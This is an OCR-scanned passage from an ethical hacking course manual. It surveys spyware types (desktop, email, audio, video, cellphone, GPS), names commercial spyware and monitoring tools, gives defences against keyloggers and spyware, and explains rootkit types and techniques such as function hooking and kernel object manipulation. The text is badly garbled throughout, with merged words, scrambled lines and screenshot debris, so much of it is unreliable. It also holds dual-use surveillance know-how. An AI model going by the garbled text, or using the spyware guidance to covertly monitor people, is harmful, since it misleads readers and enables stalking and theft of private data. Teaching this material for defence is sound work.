possible becausespyware uses advertising cookies,which is one of the spyware
subclasses. Spyware can alsoaffectyour system whenyou visit a spywaredistribution
website.Because
process
i t installs
i s knownas “drive-by itself
whenyou visit andclicksomething
downloading.―
on a website,
this

a resultof normalweb surfing

‘As or downloading activities, the systemmay
inadvertently
becomeinfectedwith spyware. It can even masquerade as anti-spyware
andrun on theuser’s
computerwithoutany notice,whenever theuser downloads and
installsprograms
that
are spyware,
bundledwith

ical andCountermensores
Mackin ©by E-Comel
Copyright
WhatDoestheSpyware
Do?
Wehavealready discussedspywareandits main functionof watching user activities on
a targetcomputer. We alsoknowthat once an attackersucceeds i n installing spyware
on a victim’s
computerusingthe propagation techniques
discussed earlier,theycan
perform Therefore,
severaloffensiveactions to the victim'scomputer. let us now learn
more aboutthe capabilitiesof spyware,a s we are now aware of its ability to monitor
user activities.
Theinstalledspyware can alsohelpthe attackerperform
the following
on target
computers:
©
personal
Stealsusers’ informationandsendsit to a remote server or hijacker
>
Monitors users’
onlineactivity
©
Displays
annoying
pop-ups
Redirects
a webbrowserto advertising
sites
Changes
thebrowser's
d efault and the user fromrestoring
setting prevents it
‘Adds
severalbookmarks
to the browser's
favoriteslist
overallsystem
Decreases level
security
Reduces performance
system instability
andcausessoftware
to remote pornography
Connects sites
desktop
Places shortcutsto maliciousspyware sites
Stealsyourpasswords

Sends
you
targeted
Changes
email
thehomepageandprevents the user fromrestoring
i t,
Modifiesthe dynamically
linkedlibraries(DLLs)andslowsdownthe browser,
Changes
firewallsettings
Monitors andreports
websitesyou visit
ofSpyware
Types
Today,various spywareprogramsengagein a varietyof offensive tasks,suchas
changing displaying
browsersettings, ads,collectingdata,etc. Thoughmany spyware
perform
applications a diversearrayof benign
activities,ten majortypesofspywareon
the Internet allow attackersto stealinformationabout users and their activities,
all
withouttheirknowledge
or consent.
© Desktop
Spyware
Desktopspyware is softwarethat allowsan attackerto gain informationabout a
user'sactivityor personal
information,sendit via the Internet to third parties

ical andCountermensores
Mackin ©by E-Comel
Copyright
withoutthe user’s
knowledge information
or consent. It provides regarding
what

Desktop
desktops,
networkusers did on their
spyware allowsattackers
how,andwhen,
to perform the following:
#

*
Live recording
ofremote
Recordingmonitoring
and
desktops
Internet activities
*
Recordingsoftwareusageandtimings
*
Recording
an activitylogandstoringi t at one centralizedlocation
Logging users’keystrokes
EmailSpyware
Emailspywareis a programthat monitors, records,andforwardsall incomingand

‘outgoing
emails. that
you
want
Onceinstalledon the computer
of spywarerecordscopiesof all incomingand outgoing
you through a specified
to monitor,thistype
emailsand sendsthemto
emailaddressor saves the informationon the localdisk
folder of the monitoredcomputer. Thisworksi n stealthmode; users will not be
aware of the presenceof email spywareon their computer. It is also capable of
recording (e.g.,
instant messages AIM,MSN,Yahoo, Myspace,Facebook),
InternetSpyware
Internetspywareis a tool that allowsyou to monitor all the web pagesaccessed by
users on your computer i n your absence.It makesa chronological recordof all
visitedURLs.Thisautomatically loadsat systemstartupand runs in stealthmode,
whichmeans that it runs i n the background undetected.Thetool recordsall visited
URLsinto a logfileandsendsit to a specified emailaddress. It providesa summary
reportof overallweb usage, suchas websitesvisited, and the time spento n each
‘website,
as well as all applicationsopened alongwith thedate/time of visits. It also
allowsyou to blockaccess to a specific web page or a n entire websitebyspecifying
the URLsor keywords that youwant to beblocked.
Child-Monitoring
Spyware
Child-monitoring
spywareallowsyou to trackand monitor whatchildrenare doing
‘on computer,both online and offline. Insteadof looking
the over the child's
shoulder, spyware,whichworksi n stealthmode;your
one can use child-monitoring
childrenwill not be aware of

of activity.
your
surveillance.
andwebsitesvisited,counts keystrokes
All the recordeddata are accessible
Thespyware logs
and mouse clicks,
through
all programsused
andcapturesscreenshots
a password-protected
web
interfaceas a hidden, file,or can be sent to a specified
encrypted emailaddress.
Thisalsoallowsyou to protectchildrenfromaccessing inappropriatewebcontent by
settingspecifickeywords that you want to block.It sendsa real-timealert to you
wheneveri t encounters the specifickeywords or wheneveryour
on your computer,
childrenwant to access inappropriatecontent.

ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Screen-Capturing
Spyware
Screen-capturing
spywareis a programthat allows you to monitor computer
activities bytakingsnapshotsor screenshots of the computer on whichthe program
is installed.Thesesnapshotsare takenlocally or remotely at specified
time intervals
andeither savedi n a hiddenfile on the localdiskor sent to an emailaddressor FTP
site predefinedbytheattacker.
Screen-capturing
spywareis not onlycapable
of takingscreenshots,
but also
captures keystrokes,mouse activity, visitedwebsiteURLs,
and printeractivitiesi n

monitorthe activities of all the computers

Thisworkstransparently
screenshots.
or
realtime, Theuser can installthis program softwareon networkedcomputers

in stealthmode so that you can monitor

to
on the network i n real time bytaking

computeractivities withoutusers’knowledge.
USBSpyware
USBspywareis a programdesigned forspyingon a computer, whichcopiesspyware
filesfroma USBdeviceonto the harddiskwithout any request or notification.It runs
in hiddenmode,so userswill not beaware ofthe spywareor surveillance.
USB spyware provides a multifaceted solution in the province of USB

filters,
devices,
as it can monitor USBdevices’
‘communications,
etc. that mightdamage
activity
without
creating
the structure of the system driver.
additional

USBspyware lets you capture,display,

record,
and analyzethe data transferred
betweenany USBdeviceandthe connectedPCand its applications.
Thisenables it
to work on devicedriversor hardwaredevelopment,thus providinga powerful
platformforeffectivecoding,
testing, andmakesit a great
and optimization, toolfor
debugging software.
It captures all the communications betweena USBdeviceand its hostand saves it
into a hidden filefor later review. A detailedlogpresents a summaryof eachdata
transaction, along
systemresources of thehostcomputer. uses
with its supportinformation.TheUSBspyware a lowlevelof
It workswith its own timestamp to logall
the activities i n the communication sequence. USBspyware doesnot contain any
adware
*
or other spyware.
works variants
It with the mostrecent ofWindows.
USBspywarecopies filesfrom USBdevicesto your harddisk i n hiddenmode
without anyrequest
* a hidden file/directory
It creates with the current date and begins
the
background
copyingprocess
* display,
Itallowsyou to capture, record,
and analyze
datatransferredbetween
anyUSBdevice PCandapplications
andtheconnected
Spyware
‘Audio
Audio spyware is a soundsurveillanceprogram designed to recordsoundonto a
computer.The attacker can silently
installthe spywareon the computer,
without
ical andCountermensores
Mackin ©by E-Comel
Copyright
 of the computer
the permission user andwithout sending
themanynotification,
The
audio spyware runs i n the backgroundto recorddiscreetly.
Usingaudio spyware
doesnot requireanyadministrativeprivileges.
Audio spywaremonitors and recordsa varietyof soundson the computer, saving
them in a hiddenfile on the localdiskfor later retrieval.Therefore,
attackersor
maliciousu sersuse thisaudiospywareto snoopandmonitor conference recordings,
phone calls,andradiobroadcasts that might
contain confidentialinformation.
It can recordand spy on voice chat messages within various popular
instant
messengers. With this audio spyware,people
c an watchover their employeesor

children
It
anddigital
helps
find out with whomthey
to monitor
a re communicating.

audiodevicessuchas various messengers, microphones,

cell
and phones. It can recordaudioconversations byeavesdropping
all incomingandoutgoingcalls,
audiosurveillance, SMStracking,
text messages,
calllogging,
and
monitoring
etc. It allowslivecall monitoring,
andGPRS tracking.
VideoSpyware
Videospywareis softwarefor videosurveillance installedon a targetcomputer
knowledge.
without the user’s All video activitycan be recordedaccordingto @
programmed Thevideospywareruns transparently
schedule. i n the background
and
secretly
monitors and recordswebcamsand video IM conversions. The remote
accessfeatureof video spyware allowsthe attackerto connect to the remote or
targetsystemto activate alertsandelectricdevices, and see recorded imagesin 2
video archiveor even capture live imagesfrom all the cameras connectedto the
system usinga webbrowsersuchas InternetExplorer,
PrintSpyware
Attackerscan monitor the printerusageof the targetorganization remotelybyusing
printspyware.Print spywareis printerusagemonitoring softwarethat monitors
It provides
printersi n the organization. precise informationabout printactivities for
officeor localprinters,whichhelps i n optimizing printing,savingcosts,etc. It
recordsall informationrelatedto the printeractivities,s aves the informationi n an
encrypted
file
log,andsendsthe log to a specified
The logreportconsistsof the exact printjobproperties,
pagesprinted, numberof copies, content printed,
over
emailaddress the Internet.
suchas the numberof
anddateand time at whichthe
printaction took place.
Printspyware recordsthe logreportsi n differentformatsfor various purposes,such
as i n a webformatforsending the reportsto an emailthrough the Internet,
or i n a
hiddenencrypted format to store on the localdisk.Thelogreportsgenerated will
helpattackersi n analyzing printeractivities.The logreportshowshow many
documents eachemployee or workstationprinted, alongwith the time. Thishelps in
printerusageanddetermining
‘monitoring howemployees are usingthe printer. This

ical andCountermensores
Mackin ©by E-Comel
Copyright
software alsoallowslimiting Thislogreporthelps
accessto the printer. attackersto
trace out informationaboutsensitive andsecretdocuments printed,
Telephone/Cellphone
Spyware
Telephone/cellphone
spyware is a software
toolthatgivesyou full accessto monitor
a victim'stelephone
phone.
or cellphone.
It will completely
hide
It will recordandlogall activityon the phone,
messages,and phone
calls.Then,
you
itself
fromthe user of the
suchas Internet use, text
can access the logged
informationvia the
software's or you can alsoreceive tracking
main website, through
information SMS
or email. Usually, this spywarehelpsto monitor and track phoneusageof
‘employees. attackersare usingit to
However, trace informationfrom their target
person's or organization'stelephones/cellphones.
Usingthis spywaredoes not
require any authorizedprivileges.
Themost common telephone/cellphone
spywarefeatures thefollowing:
include
* Call History:
Allows you to view the entire call history
of the phone
(both
incomingandoutgoingcalls)
View Text Messages: Enablesyou to view all incomingand outgoingtext
It even showsdeletedmessages
‘messages. i n the log report.
WebsiteHistory:Recordsthe entire history of all websitesvisited through
the
in the log
phone reportfile.
GPS
Tracking:
Showsyou wherethe phone
the cellphone’s
is i n realtime. There
locationso you can see wherethe phone hasbeen
is also
alog of

It worksas depicted
i n the following
diagram.
FC sae

Figure6110:
Telephone/cellphone
spyware
GPSSpyware
GPSspywareis a deviceor softwareapplication that uses the Global Positioning
System (GPS) to determinethe locationof a vehicle, person,or other attachedor
installedasset.An attackerc an use thissoftwareto trackthe targetperson.
Thisspywareallowsyou to trackthe phone
location
logfile and sendsthem to the specified
targetu ser locationpointsbylogging
points,saves
or
stores
emailaddress.You can then watchthe
into the specified
emailaddress,andviewing
themi n a

the connectedpointstracingthe phone locationhistory

o n 2 map.It alsosends

ical andCountermensores
Mackin ©by E-Comel
Copyright
 emailnotifications
oflocationproximity
alerts.An attacker
traces thelocationofthe
person using GPSspyware,as showni n the following
target figure.

abo. Satelite
set

Transmission
Power

Module
Page
6 718
tical
Making
and by CountermensoresCopyright©
Comet
 i}
Tools:Spytech
Spyware andPowerSpy
SpyAgent ¢
Sprfigent|
evertinguses do
onto
conpoer
SpySehmeronyoureonpater
|

7
Mentor
Sottcvty sae
AR.heeseyme
roe

6
Module 719
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
 Tools(Cont'd)
Spyware
Viaeo spyware ‘Telephone/Cellphone
Spyware

Tools
Spyware
+
Spytech
SpyAgent
https://www.spytech-web.com
Source:
Spytech
SpyAgent spysoftware
is computer thatallowsyou to monitor everything
users
total secrecy.SpyAgent
do o n your computer—in provides @largearray of essential
computer features,
monitoring as well as website,application,
andchatclient blocking,
logging scheduling,
andremote delivery of logs
via emailor FTP.
showni n the screenshot,
‘As attackersuse SpytechSpyAgent to track the websites
visited,onlinesearchesperformed, programsand apps i n use, file and printing
information, user login
emailcommunication, credentials,
etc. of the targetsystem.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Aernced Ontons

Contant
Fiteog

cna
Soi
View
Ory
How
Actvty
Grape
&

Figure6:12:
Screenshot
ofSpytech
SpyAzent
=

Power Spy
http://ematrixsoft.com
Source:
Power Spy software.It runs and performs
is PC-user activity-monitoring monitoring
in the background
secretly of a computer It logs
system. all users on the systemand
users will not be aware of itsexistence.
showni n the screenshots,
‘As attackers
u se thistool to monitorthe targetsystem
and
recordall user activities, such as screenshots,keystrokes, applicationsexecuted,
windowsopened, websitesvisited,chatconversations, documents opened,etc.

Modul
6 724
Page ical
and ©
Mackin
‘AEN
Promote
Countermensores by E-Comel
Copyright
Reserve.Reproduction
Sty
 Spy
Power contre
Thefollowing
is thelistofspyware:
+
Desktop
andChild-MonitoringSpyware
(https://activtrak.com)
ACTIVTrak
9

Veriato
Cerebral (http://mww.veriato.com)
NetVizor(https://www.netvizor.net)
Monitor (https://www.softactivity.com)
SoftActivity
© TSMonitor (https://www.softactivity.com)
SoftActivity
SB Spyware
USB spywaremonitors and analyzes data transferredbetween any USB device
connectedto a computer as well as its applications.
It helpsi n application
development,
USB device drivers,or hardwaredevelopment and offers a powerful platform
for
effectivecoding,
testing,andoptimization,
Thefollowing
is a listof USBspyware:

© (https://www.eltima.com)
USBAnalyzer
©

©
USB
Monitor
(https://www.hhdsoftware.com)
(httpsi//www.nirsoft.net)
USBDeview
USBPortMonitor (https://www.aggsoft.com)
‘Advanced
USBMonitorPro(http://www.usb-monitor.com)
AudioSpyware
spywarehelps
‘Audio to monitor soundandvoice recorders It invisibly
on the system.
starts recording
once it detectsthe soundand automatically
stopsrecording
whenthe
voice disappears.
It can be usedi n recording
conferences, phone
monitoring calls,radio
broadcastinglogs,
spying,andemployee monitoring,
ete.
Thefollowing
isthe lis of audiospyware:
© SpyVoice Recorder mysuperspy.com)
(http://www.
Device(https://www.securityplanet.co)
SpyAudioListening
SpyUSBVoiceRecorder(https://www.securityplanet.co)
(https://www.spytec.com)
VoiceActivatedFlashDriveVoiceRecorder
AudioSpyware (https://www.snooper:se)
Snooper
VideoSpyware
Videospywareis usedforsecret videosurveillance.
An attackercan use thissoftware to
secretly
monitor andrecordwebcams andvideoIM conversations. An attackercan use
video spyware to remotely view webcamsto obtainlive footage of secret

ical andCountermensores
Mackin ©by E-Comel
Copyright
communication. Using can recordandreplay
thisspyware,attackers anything
displayed
on the victim'sscreen.
Thefollowing
is alist of videospyware:

© MovaviVideoEditor(https://www.movavi.com)
Free2xWebcam (http://www,free2x.com)
Recorder
©. (https://www.ispyconnect.com)
iSpy
NETVideoSpy(https:/Avww.sarbash.com)
>
Eyeline
VideoSurveillance (https://www.nchsoftware.com)
Software
Cellphone
Spyware
Like Mobile Spy,a n attacker can also use the following
software programsas
telephone/cellphone
spyware to recordall activities on a phone,
suchas Internet usage,
andphone
text messages, calls
‘Some
©
of
the availabletelephone/cellphone
spywareprograms are
(https://www-phonespysoftware.com)
PhoneSpy
as follows:

0 XNSPY(https://xnspy.com)
© (https://ikeymonitor.com)
iKeyMonitor
OneSpy
(https://www.onespy..in)
(https://thetruthspy.com)
TheTruthSpy
GPSSpyware
Varioussoftwareprogramsa ct as GPSspywareto trace thelocation
of particular
mobile
devices.Attackerscan also employ the followingGPSspywaresoftwareto trackthe
of
location the targetmobiledevices.
of GPSspywareprogramsare listedasfollows:
examples
‘Some
(https://spyera.com)
Spyera
Spy (https://www.mspy.com)
MOBILESPY(http://www.mobile-spy.com)

(https://www.mobistealth.com)
Mobistealth
(https://wwwflexispy.com)
FlexiSPY

ical andCountermensores
Mackin ©by E-Comel
Copyright
 1
How to Defendagainst
Keyloggers CEH
ee
papndopening
kona
up aca aid

na
at spy
hep Scanad or
atv rams a he thes etna srs ator

recog
phishing ng,
tha
a mandate them
‘ett

eslpeste
ndash Resse
tring pam sftate peewod
manag

How to Defend Keyloggers

against (Cont'd)
Hardware Keylogger
Countermeasures

revoseaty
© checkour kb merc to ene fat no er components lige io the cableconnector
eyboan

© tat
veer etevorer detectsthepresence oa hardnreeyogsrsch

@ and
dk
on
kings
mouse
vicar onscreenteybnad

© onto
recy neck vies blestdteche resn ofhrdvaeeone

@ desk son te compute

spviseoseremane detect
he don fmakous hardare

How to Defendagainst Keyloggers

Different
countermeasuresto defend are listedasfollows:
keyloggers
against
+
Usepop-upblockersandavoidopeningjunkemails,
+
Installant-spyware/antivirus
programsandkeepthe signatures
up to date
‘+
Installprofessional
firewallsoftwareandanti-keylogging
software.

Modul
6 725
Page 1 countermensreCopyriht
©y -Comell
 phishing
Recognize emailsanddeletethem,
Regularly
update
andpatch systemsoftware,
Donot clickon linksi n unsolicitedor dubiousemailsthat may directyou to malicious
sites.
Use keystroke
interferencesoftwarethat insert randomizedcharactersinto every
keystroke.
Antivirusandanti-spyware
softwarec an detect
any installed butitis betterto
software,
detecttheseprogramsbeforeinstallation.Scanthe files thoroughly
before installing
them onto the computer to check
editor or processexplorer
and use a registry for
keystroke
loggers
Usethe Windowson-screen keyboard accessibilityutilityto enter a password
or any
‘other
confidential
information.
Use your mouse to enter any informationsuchas
passwords and credit cardnumbersinto the fields, byusing your mouse insteadof
typingthe passwords with the keyboard.This will ensure that your informationis
confidential,
Use an automatic form-fillingpassword manageror a virtual keyboard to enter
usernames and passwords, as this will avoid exposurethrough keyloggers. This
automatic form-filing
password manager will remove the needto typeyour personal,
or confidential
financial, detailssuchas creditcard numbers andpasswords via the
keyboard
your hardwaresystems
Keep secure i n a lockedenvironment and frequently checkthe
keyboard cablesfor attachedconnectors,USBport,and computer gamessuchas the
PS2that may havebeenusedto installkeylogger software.
Usesoftwarethat frequentlyscan andmonitor changes or network.
i n your system

Installa host-based
IDS, anddisable
whichcan monitor your system the installation
of
keyloggers.
Use one-time password (OTP)
or otherauthenticationmechanisms suchas two-step
or
multi-step
to
verification authenticateusers.
Enableapplication whitelisting
to blockdownloadingor installing
of unwantedsoftware
suchas keyloggers.
*
UseVPNto enable
a n additional of protection
layer through
encryption.
=
Useprocess-monitoring
toolsto detectsuspicious andsystem
processes activities
Regularlypatch
andupdate
softwareandthe OS.
HardwareKeylogger
Countermeasures
‘=

access
sensitive
computer
Restrict physical to
systems.
Periodicallycheckyour keyboardinterfaceto ensure that no extra components
are
plugged
into the keyboard
cableconnector.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 betweenthe keyboard
Useencryption andits driver.
Use an anti-keylogger
that detectsthe presenceof a hardwarekeylogger
suchas
KeyGrabber.
Usean on-screen keyboard
andclickon it usinga mouse.
Periodically
checkthe video monitor cablesto detect the presenceof hardware
keyloggers.
Set up videosurveillance deskto detectplugging
aroundthe computer i n of malicious
hardware.
DisableUSBportsor set up advancedBIOSauthenticationmechanisms
to enableUSB
ports.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Anti-Keyloggers

keysrambier

Anti-Keyloggers
Anti-keyloggers, also called anti-keystroke loggers,detect and disable keystroke logger
software. Thespecial designoftheseloggers helps themto detectsoftwarekeyloggers. Many
largeorganizations, financialinstitutions,online gamingindustries, and individualsuse anti-
keyloggers to protecttheir privacywhile usingsystems. This software preventsa keylogger
fromlogging everykeystroke typed bythe victim,andthuskeeps all personal informationsafe
and secure. An anti-keylogger scans a computer and detectsand removes keystroke logger
software.If the software (anti-keylogger) finds any keystroke-logging programon your
computer, it immediately identifiesand removes the keylogger, whether it is legitimate or
illegitimate,
Someanti-keyloggers detectthe presence of hiddenkeyloggers bycomparing all files i n the
computeragainst a signature database of keyloggers and searching for similarities.Others
detectthe presenceof hidden keyloggers byprotecting keyboard driversand kernelsfrom
manipulation. A virtual keyboard or touchscreen makesthe task of keystroke-capturing of
maliciousspywareor Trojan programsdifficult. Anti-keyloggers secure your systemfrom
spywareandkeyloggers.
=
ZemanaAntiLogger
Source:https://www.zemana.com
ZemanaAntiLogger is a softwareapplication that blocksattackers.It detectsany
attempts to modify
your computer's recordyour activities,hook to your PC's
settings,
or injectmaliciouscode into your system.
sensitive processes, TheAntiLogger detects
the malwareat the time it attacksyour system, ratherthan detectingit basedon its
fingerprint.
signature

ical andCountermensores
Mackin ©by E-Comel
Copyright
 * —

Admareas2/Bdbteur
98671060

Toensure continued fromPCthreats,Bly Now!

protection

6115:ScreenshotofZemana
Figure AntiLoger
Someexamples
ofanti-keyloggers
are listedasfollows:
+
GuardediD(https://www.strikeforcecpg.com)
=
(https://www.qfxsoftware.com)
KeyScrambler
+
Oxynger (httpsi//aww.oxynger.com)
KeyShield
Ghostpress
(https://schiffer.tech)
SpyShelter
FreeAnti-Keylogger
(https://www.spyshelter.com)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 How to Defendagainst
Spyware

How to Defendagainst
Spyware
Spyware systemwithout their knowledge.
is any maliciousprogram installedon a user’s It
gathersconfidentialinformation suchas personaldataandaccesslogs.
Spyware can originate
from three basicsources: free downloadedsoftware, email attachments,
and websitesthat
automatically
installspywarewhenyou
Different
waysto defend
browse
them,
spywareare asfollows:
against
Tryto avoidusinganycomputer system that you do not havea complete
controlover.
Neveradjust your Internet securitysetting level too low because
it provides many
chancesfor spywareto be installedon your computer. always
Therefore, set your
Internetbrowsersecuritysettingsto either highor mediumto protectyour computer
fromspyware.
Do not opensuspicious emailsand file attachmentsreceivedfromunknownsenders.
Thereis a highlikelihoodthat you will allow a virus, freeware,
or spyware onto the
computer. Do not open unknown websites linkedi n spammailmessages,
retrieved by
searchengines, or displayed i n pop-up windowsbecause theymay misleadyou into
downloading spyware.
Enablea firewallto enhancethe security levelofyourcomputer.
Regularly
updatethe software,
checkTaskManager
Regularly
a
anduse firewallwith outboundprotection.
andMSConfiguration Manager reports.
Regularly
update
virus definitionfilesandscan the systemfor spyware.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 software.
Installanti-spyware Anti-spyware is thefirstline of defenseagainst
spyware.
Thissoftwarepreventsspyware from installing
on your system. It periodically
scans and
protectsyoursystemfromspyware.
Keep yourOSup to date.
© Windowsusers shouldperiodically
perform or Microsoftupdate.
a Windows

>

refer
For users of otherOSsor softwareproducts,to the informationgivenbythe OS
andtakeessentialstepsagainstanyvulnerability
vendors, identified.
Performweb surfing
safely
anddownloadcautiously.
Beforedownloading
any software, ensure that it is from a trustedwebsite.Readthe
licenseagreement,
security warning,and privacystatements associated with the
softwarethoroughly
to gain a clearunderstanding beforedownloading it.
Beforedownloadingfreewareor sharewarefrom a website, ensure that the site is
be cautious with softwareprogramsobtained through
safe. Likewise, P2Pfile-
swappingsoftware.Beforeinstallingsuchprograms,perform a scan usinganti
spywaresoftware.

not
Do use administrativemodeunlessit is necessary,
becauseit mayexecute malicious
programssuchas spyware i n administratormode.Consequently, attackersmaytake
complete
Donot
control
of
your system.
downloadfree musicfiles,screensavers,or emoticons fromthe Internetbecause
whenyoudo,thereis a possibilitythat are downloadingspywarealong with them.
Bewareof pop-upwindowsor web pages.Neverclickanywhere on the windowsthat
display
messages suchas “your
computer or claimthat they
maybe infected,― can help
your computerto run faster.If you clickon suchwindows, your system may become
infectedwith spyware.
Carefully including
readall disclosures, the licenseagreement
and privacy statement,

any
beforeinstalling application
Do not store personal
or financialinformationon any computer
systemthat is not
totally
underyourcontrolsuchasin an Internetcafé

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Anti-Spyware
surenant aspen tena 2019
Securty

Secretnyher
ae internat ecu

Anti-Spyware
applications
Thereare many anti-spyware availableon the market,whichscan your system and
checkfor spywaresuchas malware, Trojans,dialers,worms, keyloggers,androotkitsand
remove themif found.Anti-spyware
provides
real-timeprotection byscanningyour systemat
regular eitherweekly
intervals, or daily.
It scans to ensure that the computeris freefrom
malicioussoftware,
=
SUPERAntiSpyware
Source:https://www.superantispyware.com
is a softwareapplication
SUPERAntiSpyware that can detectandremove spyware,
adware,
Trojan
horses, software,
rogue security computer worms, rootkits,parasites,
andotherpotentially applications.
harmfulsoftware

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Quceatinacentas
oeaSelec
e
“icaveaanavocing Seta

shel
med
reed
tom
our {[2items
compute
CriteatThreats
Theses Found)
( |

CL)Unwanted
esters
ar
ten
aware
oar
nts
unten
These
toms
are
net[items
nas Found}
Programs/Settings

Figure6.126:
Screenshot
of SUPERAnESpyware
Someexamples
of anti-spyware are listedas follows:
programs
Kaspersky
Internet Security2019 (https://support.kaspersky.com)
=
SecureAnywhere Complete
InternetSecurity (https://www.webroot.com)
=
adawareantivirus free(hetps://www.adaware.com)
MacScan(https://www.securemac.com)
Norton AntiVirus Plus(https://us.norton.com)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Rootkits
that hidetheirpresencea s well
Rootkits are programs attackersmalcous actives, granting
ther ul access
totheserver orost a that time,andthe fture

Roots
replace
In certain
operating
her of
undermine
tur,
systemc al andlites with own modified
thesecur ofthetargetsystemcausingmalcousfunctions
vrsons those routines that,
to beexecuted

of
backdoor
programs, bots,
|Atylcalroot comprises nies, log-wipng
DDoSprograms,packet tities,RC et.

HidingFiles
After a n attackerhasperformed maliciousoperations (i.e.,executedmaliciousapplications)on.
a targetsystemto gain escalated privileges,he/she embedsandhideshis/hermalicious
programs. Theattackerc an do thisusingrootkits,NTFSstream, andSteganography techniques,
etc. to preventthe maliciousprogramfrom protective applicationssuch as antivirus,anti
malware, andanti-spyware applications
installedon the targetsystem. Sucha hiddenmalicious

the victim’s
malicious
to
file allowsthe attacker maintain theirdirectaccess to the system,
various techniques
consent. Thissection describes
files.
even i n the future,
without
usedbyattackersto hidetheir

Rootkits
Rootkitsare softwareprograms designed to gain access to a computer without being detected.
Theyare malwarethat helpattackersgain unauthorized
access to a remote systemand
perform maliciousactivities. Thegoalof 2 rootkit is to gain root privileges to a system. By
logging i n as the root user of a system,
softwareor deleting
applications.
an attackercan perform
files. It works by exploiting
It buildsa backdoorlogin
various
tasks
suchas installing
the vulnerabilitiesin the OS and its
processi n the OSvia whichthe attacker can evade the
standardlogin process.
Oncethe user enablesroot access,a rootkit may attemptto hidethe traces of unauthorized
accessbymodifying driversor kernelmodules anddiscarding active processes.Rootkits replace
certain OScallsandutilitieswith their own modifiedversions of thoseroutines that,i n turn,
undermine thesecurityof thetargetsystembyexecuting malicious functions.A typical rootkit
comprises backdoorprograms,DDoSprograms,packet sniffers, log-wipingutilities,IRCbots,
andothers.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Allfilescontain a set of attributes.Thereare differentfieldsin thefileattributes.Thefirstfield
determinesthe formatof the file if it is a hidden, archive, or read-only file. Theother field
describes the time of the file creation, access, and its original length. The functions
GetFileAttributesExA()
and GetFileinformationByHandle()
are usedfor the aforementioned
purposes.ATTRIB.exe displays or changes the file attributes.An attackercan hide or even
changethe attributesof a victim’s
filesso that theattackercan access them,
Theattackerplaces
a rootkit by
‘=

computers
Scanning
Wrapping servers
forvulnerable and on the web

iton special
=
package
therootkit i n a likea game
'=

through
social
Installing public corporate
or computers engineering
=

Objectives
a attack
(privilege
Launching
zero-day
Windows
of a rootkit:
etc.) escalation, kernelexploitation,

=
Torootthe hostsystem
andgainremote backdoor
access
=

=
mask presence
To
To gather
ofmalicious
applications
attackertracksand
sensitive data,networktraffic,
or processes
forwhichattackersmight
etc. fromthe system
berestricted or have no access
To store othermalicious
programso n the system
andact as a server resource forbot
updates

ical andCountermensores
Mackin ©by E-Comel
Copyright
 of Rootkits
Types
Kernel
Level
Hardware/Firmware
HypervisorLevel

©
and
of hardware
tht
Aetsasahnpersor
code
ae ‘device
driver
Hdesin devicesor © Ai matcous or replaces
and

to
‘modifies
theBoots equence platform
firmware the ori OSkernal
{he computersystemfod hot nepetedor coe coder

vital
machine
hostoperating
‘he system
a 8 tea

of Rootkits
‘Types
A rootkit is a typeof malwarethat can hideitselffromthe OSand antivirus applications
on a
computer. Thisprogramprovides theattackers through
withroot-levelaccessto thecomputer
backdoors,
rootkit influences a
Theserootkitsemployrangeof techniques
thechoiceof attackvectors.
to gaincontrol system.
of
a
Thetypeof

Thereare six typesofrootkitsavailable:

=
Hypervisor-Level Rootkit: Attackers create hypervisor-level rootkits by exploiting
hardwarefeatures
such
as
Intel
VT andAMD-V. Theserootkitsrun i n Ring-1
S of the targetmachineas a virtual machine, thereby intercepting
made bythe targetO S. Thiskind of rootkit works bymodifying
and

the system's
host
the
all hardwarecalls
boot
so
Hardware/Firmware
of
sequencethat itisloaded instead the original
Rootkit: Hardware/firmware
virtual machine
monitor.
rootkits use devicesor platform
firmwareto create a persistent malwareimagei n hardware, suchas a hard drive,
systemBIOS,
it for codeintegrity.
of rootkitmalware
the use of creatinga permanent do
or networkcard.Therootkithidesin firmwareas the users not inspect
A firmwarerootkit implies delusion

Kernel-Level Rootkit:Thekernelis the core

0 with the highest OSprivileges. of
an OS.Akernel-levelrootkit runs i n Ring-
Thesecover backdoors
createdbywritingadditional code,or bysubstituting
on the computer and are
portionsof kernelcodewith
modifiedcodevia devicedriversi n Windowsor loadablekernelmodulesi n Linux.If the
kit's code contains mistakesor bugs, Kernel-levelrootkitsaffectthe stability of the
system. Thesehavethe same privileges as the OS;hence,theyare difficultto detectand
can interceptor subvertthe operationof an OS.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Boot-Loader-Level rootkits(bootkits)
Rootkit:Boot-loader-level functioneither by
modifyingthe legitimate boot loaderor replacing it with anotherone. Thebootkit can
activate even beforethe OSstarts. Therefore, bootkitsare serious threatsto security
becausetheyfacilitatethe hacking of encryption keys andpasswords.
Application-Level/User-Mode Rootkit: An application-level/user-mode rootkit runs i n
Ring-3
as a user along with other applicationsin the system. It exploits
the standard
behaviorof APIs.It operatesinsidethe victim’s computer byreplacing the standard
applicationfiles(application binaries)with rootkitsor bymodifying the behavior of
presentapplicationswith patches, injectedmalicious code, ete.
Library-Level Rootkits:Library-level
rootkits work high up i n the OS,and theyusually
patch,
hook,or supplant systemcallswith backdoorversions to keepthe attacker
unknown.They replace the originalsystem callswith fake ones to hide information
abouttheattacker.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 a
How Rootkit Works
wes ar Hoke)
re eres)

DiracKernel
Object
Manipulation
(OÂ¥ON)

xON root
by
hideproces uninkngo m thepacer
et
How a Rootkit Works
System hooking is the process of changing and replacing the originalfunction pointerwith a
pointerprovided
a rootkit changes
nitdll.dil),placing
some of the bytes Inline
bytherootkiti n stealthmode. functionhooking
of a functioninsidethe core system
an instruction so thatanyprocess
is a technique
i n which
DLLs(kernel32.dll
callshit therootkitfrst.
and

DirectKernelObject
“Manipulation
(OKOM)

Figure6.117:
Workinof rootkit
Directkernelobjectmanipulation (DKOM) rootkitscan locateand manipulatethe “system―
processi n kernel memorystructures and patchit. Thiscan alsohide processes
and ports,
change privileges, and misguide the Windowsevent viewer without any problem by

ical andCountermensores
Mackin ©by E-Comel
Copyright
